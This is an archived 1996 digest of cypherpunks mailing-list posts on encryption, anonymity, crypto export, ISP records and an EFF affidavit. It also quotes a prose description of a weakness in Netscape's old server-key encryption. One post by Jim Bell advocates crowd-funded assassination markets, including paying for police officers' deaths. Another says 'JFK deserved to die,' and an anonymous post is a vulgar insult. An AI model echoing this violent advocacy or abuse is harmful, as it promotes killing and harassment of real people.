Wed, 25 Sep 1996, Marc J. Wohler wrote: > Date: Wed, 25 Sep 1996 10:29:23 -0400 > From: "Marc J. Wohler" > To: cypherpunks at toad.com > Subject: Re: WHO IS MAKING A MOCKERY OF WHOM? > > At 05:55 PM 9/24/96 -0400, you wrote: > >At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote: > > > >>C'punks, > >>Time for another informal poll. > >> > >>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote: > >>> What a joy to make a public mockery of Tim Mayo! > >> > >>Do list members think Anonymous' posts make a public mockery of > >>Tim May or Anonymous? Let me know whose reputation you think > >>is enhanced or tarnished by these posts. I'll post a summary to > >>the list in a week or two. > > > > I vote for Anonymous. > > Also, it seems evident that some non-anonymous posters aka KTOM seem to > understand how to *abuse* our American freedom's but don't understand about > *responsible* use. > > Is this a deliberate attempt to damage this list or is it that some folk > just can't handle freedom? > > M. J. Wohler > I agree... the postings of Anonymous about "Timmy" pretty much just make us want to killfile "Anonymous" more and more. On the other hand (or maybe its the same hand), Tim's response to these postings is basicly "I have nothing to hide, take your best shot". Personally, I havn't seen Tim lie, cheat, steal, have sex with animals, etc., and until I do his rep. is fine to me. --Deviant Would it help if I got out and pushed? -- Princess Leia Organa From jsw at netscape.com Wed Sep 25 15:44:10 1996 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 26 Sep 1996 06:44:10 +0800 Subject: [Long] How to break Netscape's server key encryption In-Reply-To: <84366802803808@cs26.cs.auckland.ac.nz> Message-ID: <3249833B.3EEE@netscape.com> pgut001 at cs.auckland.ac.nz wrote: > > The Netscape server key format is very susceptible to both a dictionary attack > and to keystream recovery. It uses the PKCS #8 format for private keys, which > provides a large amount of known plaintext at the start of the data, in > combination with RC4 without any form of IV or other preprocessing (even though > PKCS #8 recommends that PKCS #5 password-based encryption be used), which means > you can recover the first 100-odd bytes of key stream with a simple XOR (the > same stupid mistake Microsoft made with their .PWL files). This means two > things: > > 1. It's very simple to write a program to perform a dictionary attack on the > server key (it took me about half an hour using cryptlib, and another half > hour to rip the appropriate code out of cryptlib to create a standalone > program). > > 2. The recovered key stream from the encrypted server key can be used to > decrypt any other resource encrypted with the server password, *without > knowing the password*. This is because there's enough known plaintext > (ASN.1 objects, object identifiers, and public key components) at the start > of the encrypted data to recover large quantities of key stream. Peter, The attack you describe is indeed possible with the Netscape Commerce Server 1.x. However current Netscape products, such as Navigator, Enterprise Server, and FastTrack Server, have improved private key encryption that prevents these types of attacks. Note that the old key handling code is of the same vintage as the random number seed code that was shown to be weak last year (from before I got here). I recognized this particular problem quite some time ago, and fixed all of the products that were then in development. If someone is running the old Commerce Server, and is not confident that the file system of their server machine can not be accessed by attackers, I would recommend that they upgrade to the FastTrack or Enterprise servers. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From mix at squirrel.owl.de Wed Sep 25 15:58:34 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Thu, 26 Sep 1996 06:58:34 +0800 Subject: A periodic word of caution regarding Timothy C[unt] May Message-ID: <19960925190103.5469.qmail@squirrel.owl.de> Timothy C[unt] May proves that the Midwestern gene pool needs some chlorine in it. From billc at true.com Wed Sep 25 16:04:40 1996 From: billc at true.com (William Clinton) Date: Thu, 26 Sep 1996 07:04:40 +0800 Subject: your mail Message-ID: <01BBAAF6.D1ED7EE0@billc.true.com> Likewise, please remove info at truecom from this list. ---------- From: Andrew Kantor[SMTP:ak at mecklermedia.com] Sent: Wednesday, September 25, 1996 2:58 PM To: John Norseen; Craig; Robert Steele Cc: news_from_wschwartau at infowar.com; Betty G. O'Hearn; Winn Schwartau Subject: Re: your mail I'm not sure what this list is or why I'm on it, but would whoever runs this thing please remove me or send removal instructions. Thanks. AK ------------------------------------------------------------ Andrew Kantor ak at iw.com Senior Editor, Internet World http://www.iw.com Otherwise, no one of consequence. http://www.kantor.com ------------------------------------------------------------ "Don't argue with the man who buys ink by the barrel." From wb8foz at nrk.com Wed Sep 25 16:07:06 1996 From: wb8foz at nrk.com (David Lesher) Date: Thu, 26 Sep 1996 07:07:06 +0800 Subject: Medical Data In-Reply-To: Message-ID: <199609252016.QAA03115@nrk.com> Phil Fraering sez: > Of course, with the really big problems with this stuff, drug > interactions, there's still no system for a doctor to find out what you're > on thanks to another doctor. Which is why it's very important to always > use the same pharmacist. So the pharmacist can sell that data about you to the drug and insurance companies........ -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From probst at iro.umontreal.ca Wed Sep 25 16:19:18 1996 From: probst at iro.umontreal.ca (David K. Probst) Date: Thu, 26 Sep 1996 07:19:18 +0800 Subject: your mail Message-ID: <199609251931.PAA13139@griao.iro.umontreal.ca> Well, obviously the distribution list is the entire P-TRAK database from Lexis/Nexis. :-) David K. Probst From dlv at bwalk.dm.com Wed Sep 25 16:20:51 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 07:20:51 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <9609251433.AB02026@cti02.citenet.net> Message-ID: "Jean-Francois Avon" writes: > Please reply by e-mail since I am not on Cypherpunks anymore. Good riddance. That's the kind of subscribers this list needs to lose, rather than the technical people. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 25 16:33:29 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 07:33:29 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: Phil Fraering writes: > It's widely believed that the New Orleans Mafia (the source of my recent > statement about body decomposition in Louisiana swamps) was a prime driver > in the assasination of the late President John F. Kennedy. > > I think it's fairly safe to say that having done this didn't do them a > damn bit of good. It didn't do anyone else a damn bit of good. JFK deserved to die. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Wed Sep 25 16:46:02 1996 From: jya at pipeline.com (John Young) Date: Thu, 26 Sep 1996 07:46:02 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <199609252037.UAA11310@pipe2.ny3.usa.pipeline.com> Nikkei English News, 24 September 1996. Mitsubishi unveils Japan's fastest encryption chip Mitsubishi Electric Corp. said it has developed an LSI that can encrypt data at a speed of 450 megabits per second, which is four times faster than any other encryption chip developed in Japan and brings domestic technology in line with DES, the U.S.-developed encryption system that has become the standard in the U.S. and Europe. Because the chip performs the same as DES, Mitsubishi will promote it as a domestic product for encryption needs in Japan, with an eye on the growing market for corporate intranets and high-speed data communications. It said it will prepare for volume production during this year. The company fabricated the chip as a gate array using a 0.5 micron CMOS process and its own proprietary encryption algorithm MISTY. Operating at a maximum input/output speed of 40 megahertz, the chip can handle 32 bits per clock cycle. [End] From pgf at acadian.net Wed Sep 25 16:51:55 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 07:51:55 +0800 Subject: Possible snake oil? Message-ID: I ran across this at the web site of a New Orleans area web authoring company. I checked with a friend of mine of long standing on this list, and he assured me that the information was probably false. (Here it is...) Well? Do _any_ of you know of a 1024-bit encryption standard for the world wide web currently in use? According to these people, they're using it. ObLegalQuestion: Should I have been less coy about the corporation name? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From jimbell at pacifier.com Wed Sep 25 17:12:32 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 26 Sep 1996 08:12:32 +0800 Subject: SAY WHAT? [Assassination NOISE] Message-ID: <199609252034.NAA23641@mail.pacifier.com> At 12:30 AM 9/25/96 -0700, Bill Stewart wrote: >Bell, like X, is proposing mechanism without built-in policy, >as well as suggesting some potential policy implementations. If you use >the mechanism to sponsor assassination of people who have initiated force >against you, you're only using retaliatory force, not initiating it. Funny that Simon didn't see that... >On the other hand, the mechanism also can be used against people who >haven't initiated force against the sponsor - even against politicians >who have refused to get the country into misguided but popular wars >or judges who have refused to convict innocent but wrong-colored defendants. That's a too-superficial interpretation. If AP were operating, it would be unnecessary to "get the country into misguided but popular wars" because anybody who wanted to war with some external enemy need merely kill him via AP, by individual donation. There would be no legislature to make the war decision, and no need for any such decision. War as we have known it (a collective decision that is binding on all citizens, whether or not they approve) would simply not exist. There would be no mechanism to force other people into a war on your side, other than rhetorical arguments. Attempting to do so by force would merely make more enemies. As for "judges who have refused to convict innocent but wrong-colored defendants"? I think that's an unfair and misleading "problem." Much of the problem of bias and discrimination in this country is caused by the fact that these factors have been institutionalized BY GOVERNMENT. Trace it back just a little, and you'll discover that the "innocent but wrong-colored defendants" were arrested and charged BY GOVERNMENT in a display of bias. At best, that courageous judge is merely ceasing, in one particular incident and too late, an episode of bias which shouldn't even have been started in the first place. Is this "good"? Not really. It's just "not quite as bad." There's still the underlying problem which will repeat ad infinitum. Why depend on a judge to do this? Why not fix the bias before the defendant gets to court? I look at it this way: Why shouldn't the black community (and any outraged whites, as well...) have been able to purchase the deaths of all of the LAPD officers who beat Rodney King, INCLUDING the ones who stood around and watched it happen? I claim that in a society where they could do this, such a beating simply would never have happened, because no cop would have dared to take the risk that a camera would be nearby. In other words, the problem would have been solved before it started. The quickest response to this is that "pretty soon, you won't have any more cops." But no, that's not true. It _is_ true that the thugs will no longer want to become/stay as cops, so that'll be a loss for the good. More likely, cops will simply stop doing those things that will end up offending a substantial fraction of the population, like beating a carload illegal immigrants that they have stopped after a car chase. >Like democracy, it's a really terrible system, and like democracy, >there are some alternatives that aren't worse :-) Maybe even democracy. >It's at least as appalling an idea as government. > >If it does catch on, and I suspect that the technology will certainly >make it possible, I hope that most of the public will have enough sense >and decency not to pay for murdering people who don't deserve it, >so assassins will find more of a market for killing people who do, >and that the lower-paid assassins who kill undeserving people will >be less competent and get caught like most stupid bank robbers do. > >But there are enough Drug-War-Loving Americans that I doubt it. The de-facto drug war won't end instantly after the adoption of AP, but it will be pretty quick. Instead of today, when every citizen is forced through taxation to support the Drug War, this will probably drop to 25% voluntary contributions or less post AP. It's pretty hard to get enthused about a victimless crime, and likewise it's hard to enforce such rules, so people's donations won't match the pre-AP funding. Classic drug-warriors won't dare spread any of their propaganda; people's memories will still be fresh on the pre-AP abuses, so the Bennetts and the Rangels will either be silent or dead, or effusive with apology for their prior behavior. Further, the dramatic drop in the prices of currently-illegal drugs will translate into a similarly large drop in crimes to pay for those drugs, an improvement that everybody will notice. >And attila replied >> all very true. but I will defend Jim Bell's rights to propose >> them, even if Bell is more than a few cards short of a full deck. > >Sure, he's got the right to, and if I run a remailer again he's welcome >to use it to discuss AP (though not to propose assassinations....) >Doesn't mean I want to encourage this sort of thing, though. >Remailers can damn well afford to be choosy, and I'll bet >5 zorkmids that the first person to use my remailer for assassination >doesn't last a month. (Oh, wait...) "Your bet has been duly recorded, sir." Jim Bell jimbell at pacifier.com From raoul at sunspot.tiac.net Wed Sep 25 17:15:54 1996 From: raoul at sunspot.tiac.net (Nico Garcia) Date: Thu, 26 Sep 1996 08:15:54 +0800 Subject: LACC: ISPs' information on users In-Reply-To: Message-ID: <199609251533.LAA28373@sunspot.tiac.net> -----BEGIN PGP SIGNED MESSAGE----- Fortunately, if you take a look at USCC 18, I believe section 2701 but could be off, the police in the US need a subpoena to get that data. Not a warrant; a *subpoena*. One of the best things that came out of the Electronic Communications Privacy Act, IMHO. Nico Garcia raoul at tiac.net -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMklQx37Cg0E0WGE5AQGTigQAknpxlRZUTdqkXdA2alFVfghKIATkxCe9 MTZuDcma523mbClj6irSZ0EB7ttOq2gT1eC8FeIX0WlqEUu3ZeNFvkmR5uK9HxYd JdaB3/lrHLGZNvqQ4H50aD0Zlf3ufTRjknJwDTFVBv31GlqJM1458k6IULeRLuMw HrjkQPgZndQ= =rL7X -----END PGP SIGNATURE----- From aba at dcs.ex.ac.uk Wed Sep 25 17:37:13 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Thu, 26 Sep 1996 08:37:13 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609251240.IAA14357@sherry.ny.ubs.com> Message-ID: <199609251555.QAA00118@server.test.net> pjb at ny.ubs.com writes: > Adam, you know the german government did not win this one, and i know that > they did not win, Agreed. > my point was, will they, and other governments take this as a win > and be encourgaged to press their luck with someone else. They are claiming a victory, and the net is claiming a victory. The net is correct, they are deluding themselves. They might take what they think is a victory as an encouragement to try the same thing on some other site based on another topic, I agree with your synopsis. I think more would be gained if they could be made to face up to their loss. If they tried to block all of the mirrors for instance, I think this would be marvelous, for the obvious reason that it would backfire on them heavily. My point was therefore to suggest methods of trying to ensure that the relevant people in german politics and the press could be made aware of their loss. I am wondering how someone in Germany could engineer the necessary contacts. By demonstrating to a journalist how it has not been stopped. Perhaps by writing to the politicians responsible for the scare listing the number and jurisdictions of sites? These are some things that I think it might be fruitful for someone in Germany to write to their polticians and journalists. If one of the Germans who have posted to keep us up to date on this topic could undertake to do this, I think they would be doing something very useful for the cause of free speech. For xs4all management to write the same people a letter saying the same might also be useful. It needs some Germans to shout loudly on this. Perhaps there are some pressure groups who are pro-censorship who could be `fed' this information, and encouraged to pressure the German politicians, to also inadvertently help out the cause of free speech. I'm trying to work up some _action_ here, any takers, German cpunks? Adam From azur at netcom.com Wed Sep 25 17:45:50 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 26 Sep 1996 08:45:50 +0800 Subject: Where to write crypto? Message-ID: >On Tue, 24 Sep 1996, Steve Schear wrote: > >> I believe Taiwan might be an excellent location to have 'clear room' crypto >> work done. Taiwan has a very large skilled software labor pool and isn't a >> member of COCOM. >Why go so far, when you can export crypto from Anguila or Canada. The >first is right next to Florida and is a tax haven, the second has a large >talent pool and the same qulity telecom as the States. The main problem is >concealing the fact that there may be any Americans involved. Both save >you the trouble of learning Chinese. I didn't mean that an U.S. citizen should relocate and develop in Taiwan. Why do that when almost all Taiwanese CS speak, read and write fluent english. Just develop the specs and contract for programming. There are many companies waiting to take you business . BTW, there a several U.S. companies (e.g., Typhoon Software, typhoon at typhoon.com) which can manage the development of a wide variety of software projects (including crypto code) by highly qualified personel in the former Soviet Republics. For comfort, the software can be tested in the U.S. (just to make sure no trapdoors have been insered by the Russian Mafia ;-) -- Steve From mech at eff.org Wed Sep 25 17:50:23 1996 From: mech at eff.org (Stanton McCandlish) Date: Thu, 26 Sep 1996 08:50:23 +0800 Subject: Dyson on anonymity (in WSJ article on our challenge to GA net law) Message-ID: <199609252017.NAA24875@eff.org> FYI: [...] Esther Dyson, president of high-tech publisher EDventure Holdings Inc. and chairwoman of the Electronic Frontier Foundation, a high-tech civil liberties organization that is a co-plaintiff in the lawsuit, calls the Georgia law "brain-damaged and unenforceable," and adds: "How are they going to stop people from using fake names? Anonymity shouldn't be a crime. Committing crimes should be a crime." [...] -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From mech at eff.org Wed Sep 25 17:50:29 1996 From: mech at eff.org (Stanton McCandlish) Date: Thu, 26 Sep 1996 08:50:29 +0800 Subject: EFF declaration/affidavit in support of anonymity in GA case. Message-ID: <199609252203.PAA27878@eff.org> Full text (with some scannos, but it's readable) in next message. Enough about "lies". We're not just talkin' the talk, we're walkin' the walk too. Also, we are negotiating final details on assisting Julf with a legal defense fund for anon.penet.fi's troubles. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From deeb at x.org Wed Sep 25 18:03:48 1996 From: deeb at x.org (Stephen Humble) Date: Thu, 26 Sep 1996 09:03:48 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: <9609251720.AA20644@hydra.cde.x.org> tcmay at got.net (Timothy C. May) sez: > Could ISPs in the UlS. be compelled to report on the browsing and > net surfing habits of their customer base? Such as when the police/feds/Big Brother's Helpers come in, seize every piece of computer equipment on the site for "investigation", put it in a warehouse for 2 years so they can read everything and save whatever appeals to them in their private databases? As Steve Jackson Games found out, it can be slow and expensive to get the "evidence" back and the satisfaction of watching a judge ream BBH is no guarantee that such shenanigans will cease. I hope the ISP used strong encryption on all their disks and tapes. Sadly, I have no idea how to make sure an ISP I use does that properly or how to get an exhaustive list of what kind of records they keep. tcmay at got.net (Timothy C. May) sez: > To make this clear, I don't mean in a specific criminal case, where > the records are searchable under a warrant. I mean a blanket order > that all ISPs compile and forward records. How many pieces of thread does it take to make a blanket? Stephen From unicorn at schloss.li Wed Sep 25 18:04:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 09:04:17 +0800 Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature of the Cypherpunks List) ) In-Reply-To: <199609251219.OAA28483@digicash.com> Message-ID: On Wed, 25 Sep 1996 bryce at digicash.com wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > It's silly to conflate ratings of people with ratings of > people's opinions with ratings of people's ratings of etc. > > > Some of the people I work with have awful opinions on politics, > other people, music, movies, books, and food, but great opinions > on computer hardware, algorithms and programming languages. > > > But their ratings as people are generally very high. > > > (Insert inaccurate but amusing joke to the effect that if > someone has good taste in restaurants they are likely to have > poor taste in video cards, or some such.) > > > Check out Firefly (www.ffly.com). (Cpunk comment: they only > track your ratings by nym, no True Name required.) > > > Firefly has the "if I agreed with Bob a lot in the past on this > subject, I'll probably agree with him again" heuristic. It > appears to be a pretty ugly heuristic when applied to me. Ffly > keeps trying to suggest music which is in the same _genre_ as > music I have previously recommended, but what I am interested is > music that is similarly _good_. My tastes don't correspond well > to genres. > This is incorrect. Firefly actually looks at what you have recommended and then finds others who have recommended or favor the same songs/albums/groups and selects new groups albums or songs based on the number of people who agree with your recommendations who suggest them. i.e. if you give the eagles a 5 out of 5, and 20 others also gave the eagles high ratings, the system weeds out what other groups those 20 gave high ratings to and suggests them to you. As you confirm or deny your interest in those groups, the system narrows it down even more, using those choices to find others who seem to have similar tastes to you and suggesting albums and groups not yet in your file which have been recommended by those with tastes like yours. This trancends genres. It's quite a nice system. It also makes an important point about reputations. Using a catagory reputation scale is, as the author above describes, not very efficient. > > But this is a mere anecdotal impression. Give it a spin. > > > I wrote in the suggestion box that they add meta-ratings > (especially ratings on the little "movie reviews" submitted by > other FFly users). Some guy wrote back (same day!) that they > were planning on it. > > > Regards, > > Bryce > > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2i > Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 > > iQB1AwUBMkkjQkjbHy8sKZitAQF5wAL/WgD5iPOR7RtCc5SNgLMGqKUJqHLiS7bM > XItX4p8Z1Uri5DZgAUoOCDZ7iEoP3rleDBThGq3rFG8y6I9tbFueC00TRwoft5rb > fR7pqeaDj2AzcSt4rYCi67ucsW4wQi1C > =rL1w > -----END PGP SIGNATURE----- > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From jnorseen at gelac.mar.lmco.com Wed Sep 25 18:24:57 1996 From: jnorseen at gelac.mar.lmco.com (John Norseen) Date: Thu, 26 Sep 1996 09:24:57 +0800 Subject: your mail Message-ID: robert, good to hear from you again...what else is new and exciting on your front...norseen From ichudov at algebra.com Wed Sep 25 18:24:59 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Thu, 26 Sep 1996 09:24:59 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: <19960925060114140.AAA186@IO-ONLINE.COM> Message-ID: <199609252211.RAA02676@manifold.algebra.com> > >> Soon I am going to be going overseas to Japan, and I want to take > >> my notebook with me so I can keep up with everything, however, I have > >> encrypted my hard drive and usually encrypt my mail. Is this in > >> violation of the ITAR to keep everything the same when I go over? Gentlemen, us customs does not give shit about what you take out on your diskettes. When I went to Russia recenty, I took PGP for DOS, and no one gave me any problem. IANAL - Igor. From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 25 18:28:36 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 26 Sep 1996 09:28:36 +0800 Subject: Uses of Computational Chaos Message-ID: <01I9WC3IZ5VO8Y53G5@mbcl.rutgers.edu> From: IN%"adamsc at io-online.com" "Chris Adams" 17-SEP-1996 15:12:13.73 >Supposing, too, that you know these weaknesses, would using separate algorithms >for different portions of the number work well? That would seem to be a possibility; admittedly, the local copy of AC has been checked out for the past year, so I haven't been able to take a look at it. I'd tend to think that if you _know_ the flaw, one could come up with a better way to deal with it than the generalized method I discussed. For instance, if the MSB of bytes coming out of a scribble window is too low in entropy, only use it XORed or whatever with a more-random bit. -Allen From ericm at lne.com Wed Sep 25 18:33:16 1996 From: ericm at lne.com (Eric Murray) Date: Thu, 26 Sep 1996 09:33:16 +0800 Subject: Possible snake oil? In-Reply-To: Message-ID: <199609252236.PAA08577@slack.lne.com> Phil Fraering writes: > > > I ran across this at the web site of a New Orleans area web authoring > company. I checked with a friend of mine of long standing on this list, > and he assured me that the information was probably false. > > (Here it is...) [..] > > SSL & SHTTP Encrypted Web Systems (using the maximum > 1024-bit encryption keys) [..] > Well? Do _any_ of you know of a 1024-bit encryption standard for the world > wide web currently in use? According to these people, they're using it. In non-"export" SSL using RSA as the key-exchange algorithim 1024-bit RSA keys can be used. 128-bit RC4 is most commonly used as the symmetric algorithim in this case. It's not snake oil. I'd guess that some marketing-type person found out enough about SSL to know that it uses 1024-bit RSA keys and thoght that since 1024 bits is bigger than 128, they'd claim 1024 bit keys. There's nothing really wrong with that. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm If you don't see the fnords, they won't eat your packets. If you do see the fnords, they will eat your packets, so you won't see them. PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From tcmay at got.net Wed Sep 25 18:34:57 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 09:34:57 +0800 Subject: ISPs' information on users Message-ID: At 2:43 PM 9/25/96, Phil Fraering wrote: >On Tue, 24 Sep 1996, Timothy C. May wrote: > >> (There's a certain new ISP with tight links to a quasi-religious group much >> in the news lately, and some have speculated that this ISP may be >> monitoring certain users....) >> >> --Tim May > >Which ISP and religious group is this? Just why do you think I was elliptical in my comments? To type three lines instead of just typing the name? Think about it. With Webcrawlers looking for names of organizations--and the Cypherpunks archives show up on such searches--and with some organizations being very quick to sue for perceived defamation.... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ses at tipper.oit.unc.edu Wed Sep 25 18:43:36 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 26 Sep 1996 09:43:36 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: <3248DE04.5363@gte.net> Message-ID: On Wed, 25 Sep 1996, Dale Thorn wrote: > > I understood the intent of AP was to take powers the government is > already exercising (unconstitutionally), and merely transfer some of > them to the people, as it were. > > Isn't this true democracy (if a rather perverse kind)? Not really- however, no matter what it is, it isn't a Libertarian scheme, as libertarian philosophy holds that those powers are the defining characteristic of goverment; AP doesn't abolish governments, it creates lots of little governments which don't even have to pretend to be democracies. Simon From tcmay at got.net Wed Sep 25 18:52:28 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 09:52:28 +0800 Subject: Where to write crypto? Message-ID: At 2:05 PM 9/25/96, s1113645 at tesla.cc.uottawa.ca wrote: >Why go so far, when you can export crypto from Anguila or Canada. The ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >first is right next to Florida and is a tax haven, the second has a large >talent pool and the same qulity telecom as the States. The main problem is >concealing the fact that there may be any Americans involved. Both save >you the trouble of learning Chinese. Are you _sure_ about what you say about Canada? After all, in nearly all defense- and crypto-related matters, they are essentially the 51st State. In fact, Canada is one of the places crypto may be exported _to_ from the U.S. without any license. So, export strong crypto into Canada and then invoke the "you can export crypto from...Canada" clause? I don't think so. As to Anguilla, I fear it's too small an island and too tightly controlled by the Ruling Families, who will take action if the boat gets rocked enough. The recent experiences with Vince essentially repudiating certain policies he had publically announced have left his experiment with not a lot of "backbone" (no pun intended). As Vince said, paraphrasing his comments, the government of Anguilla will take steps to stop things which cast the island in a bad light. Not much of a haven, eh? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From makof at alias.cyberpass.net Wed Sep 25 18:56:59 1996 From: makof at alias.cyberpass.net (makofi) Date: Thu, 26 Sep 1996 09:56:59 +0800 Subject: Winsock Remailer Ver 1.3 -- Help! Message-ID: <199609251716.KAA24266@sirius.infonex.com> Hello! It could receive message but not remail. What could be the problem? A sample of the Statistics Table is as follows: Messages remailed 0 Messages discarded 3 Messages received 10 Other particulars are: 1) Pool set as 3 for light traffic 2) POP 3 working fine in other email applications. 3) Platform is Windows 3.1 Some Questions: 1) What should be the entries in the PGP Options dialogue box? 2) Do I have to create separate public and secret keyrings for the remailer? Would apprecaite any help. Makofi From mech at eff.org Wed Sep 25 19:08:29 1996 From: mech at eff.org (Stanton McCandlish) Date: Thu, 26 Sep 1996 10:08:29 +0800 Subject: affeff.htm Message-ID: <199609252203.PAA27883@eff.org> EFF AFFIDAVIT IN THE UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF GEORGIA ATLANTA DIVISION AMERICAN CIVIL LIBERTIES ) UNION OF GEORGIA, et al, ) ) Plaintiffs, ) CIVIL ACTION ) vs. ) ) FILE NO. _______ ZELL MILLER, in his official ) capacity as Governor of the ) State of Georgia, et al, ) ) Defendants. ) DECLARATION OF SHARI STEELE County of Charles ) State of Maryland ) 1. My name is Shari Steele. I am employed as staff counsel for the Electronic Frontier Foundation (EFF), a nationwide, nonpartisan nonprofit civil liberties organization of approximately 3500 individual members. EFF works in the public interest to protect privacy, free expression, and access to public resources and information online, as well as to promote responsibility in new media. EFF is committed to defending civil liberties in the world of computer communications, to developing a sound legal framework for that world, and to educating government, journalists, and the general public about the legal and social issues raised by this new medium. The facts set forth in this declaration are based upon my personal knowledge and upon the business records of EFF. I submit this affidavit on behalf of EFF. 2. EFF is a nonprofit organization incorporated under the laws of California, with our principal place of business in California. EFF has members throughout the United States, including Georgia. 3. Since our inception in 1990, EFF has devoted considerable resources to educating the public about civil liberties and other legal issues as they arise in the context of online computer communications, or "cyberspace." Throughout EFF's existence, we have initiated and/or moderated several online forums, including forums on the World Wide Web, the WELL (a California-based conferencing system and Internet Service Provider), and USENET discussion groups. These forums are primarily interactive discussion groups, but EFF representatives also frequently participate in online "chat" rooms and in special online events that allow users to discuss and debate a variety of legal and constitutional issues. 4. In addition, EFF has our own computer site on the Internet, and our name (sometimes referred to as a "domain" name) is "eff.org." EFF's public education efforts include the maintaining of extensive online resources, both on the forums we run with online service providers and on our own Internet site. These resources include articles, court cases, legal papers, news releases, newsletters, and excerpts from public discussions related to EFF's legal, legislative, educational and advocacy work. EFF also publishes web pages on the World Wide Web, which can be accessed at http://www.eff.org/. 5. EFF maintains eight online mailing lists, both for specific civil-liberties and activist activities, and for informing the public about our activities. Our primary mailing list has a subscriber base of approximately 7500 individuals, including many located in the State of Georgia. 6. On average, EFF's web page is accessed by Internet users more than 300,000 times every day. Through our web site, EFF transmits between 1.2 to 1.5 gigabytes of information per day. Roughly speaking, this means that EFF's web site transmits the equivalent of 250 to 350 million words, or two entire encyclopedias' worth of information, over computer networks every day. A substantial volume of this information is transmitted into the State of Georgia or through wires located in that State. 7. Although EFF's web site and many of our online resources are based on a computer in California, those resources are accessible to EFF members and other interested individuals throughout the world and in every state of the United States, including the State of Georgia. Similarly, the EFF resources and forums that are maintained on other national commercial online forums can by accessed by those systems' subscribers throughout the United States, including the State of Georgia. 8. EFF routinely advises individuals and groups about their legal rights and responsibilities in the online world. In addition, EFF advocates positions, and promotes discussions, about what those rights and responsibilities should be. Since virtually all interactions on the Internet and other computer networks are at their essence communication and expression, EFF's policy positions and the discussions we foster strongly emphasize freedom-of-speech concerns. Similarly, because free flow of information made possible by this new online technology creates the possibility of extraordinary intrusion into the privacy of computer users, EFF's policy positions and the discussions we foster strongly emphasize the issues of protection of online privacy, including the right to communicate anonymously over computer networks and the right to use encryption software to prevent unauthorized interception and viewing of private communications sent over computer networks. 9. As a part of EFF's efforts to protect the privacy of on line users and in furtherance of free speech, EFF routinely assists our members and members of the general public in protecting their privacy when communicating over the Internet, while at the same time emphasizing the importance of using these privacy rights responsibly. EFF facilitates responsible anonymous communication over computer networks in several ways. For example, many participants in online discussions and chats sponsored by EFF use "handles," i.e., assumed names, rather than their actual names. EFF also provides links on our web page to so-called "anonymous remailers," which are computers on the Internet that will forward Internet e-mail anonymously, allowing an even greater level of privacy for online communications than can be obtained by the use of pseudonyms alone. EFF is aware of and facilitates the responsible use of online handles or pseudonyms, and of communications via anonymous remailers, because the ability to communicate over online networks in this way allows users to 